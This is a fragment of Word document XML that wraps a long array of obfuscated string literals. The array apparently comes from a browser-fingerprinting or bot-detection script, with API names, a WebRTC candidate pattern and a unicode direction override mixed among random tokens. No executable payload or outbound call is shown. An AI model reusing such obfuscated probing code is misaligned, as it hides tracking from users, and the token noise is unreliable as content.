      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k","clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0","t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB","jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ","U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
